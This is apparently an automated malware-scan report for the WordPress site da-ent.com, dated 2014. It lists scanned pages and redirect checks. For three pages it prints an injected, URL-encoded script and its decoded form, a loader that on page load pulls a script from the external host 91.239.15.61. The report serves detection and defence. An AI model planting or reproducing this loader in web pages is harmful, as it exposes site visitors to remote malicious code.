Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=da-ent.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://da-ent.com/ | 200 OK Content-Length: 29562 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://da-ent.com/wp-content/themes/surya/ddsmooth/jquery.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://da-ent.com/wp-content/themes/surya/ddsmooth/ddsmoothmenu.js | 200 OK Content-Length: 8880 Content-Type: text/javascript | clean |
http://da-ent.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: text/javascript | clean |
http://da-ent.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3 | 200 OK Content-Length: 9986 Content-Type: text/javascript | clean |
http://da-ent.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: text/javascript | clean |
http://da-ent.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 1791 Content-Type: text/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js | 200 OK Content-Length: 85260 Content-Type: text/javascript | clean |
http://da-ent.com/wp-content/plugins/nivo-slider-for-wordpress/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 15853 Content-Type: text/javascript | clean |
http://da-ent.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.25.0-2013.01.18 | 200 OK Content-Length: 15158 Content-Type: text/javascript | clean |
http://da-ent.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.3 | 200 OK Content-Length: 6933 Content-Type: text/javascript | clean |
http://da-ent.com/?feed=rss2 | 200 OK Content-Length: 32259 Content-Type: text/xml | clean |
http://da-ent.com/?p=1664&show=slide | 200 OK Content-Length: 25144 Content-Type: text/html | clean |
http://da-ent.com/?page_id=13651 | 200 OK Content-Length: 29216 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://da-ent.com/?page_id=13706 | 200 OK Content-Length: 29580 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: da-ent.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 26 Jul 2014 04:11:16 GMT
Pragma: no-cache
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=ns2noed3l68f8rs805ptq56rr5; path=/
X-Pingback: http://da-ent.com/xmlrpc.php
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: da-ent.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 26 Jul 2014 04:11:16 GMT
Pragma: no-cache
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=ns2noed3l68f8rs805ptq56rr5; path=/
X-Pingback: http://da-ent.com/xmlrpc.php
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: da-ent.com
Referer: http://www.google.com/search?q=da-ent.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: da-ent.com
Referer: http://www.google.com/search?q=da-ent.com
Result:
The result is similar to the first query. There are no suspicious redirects found.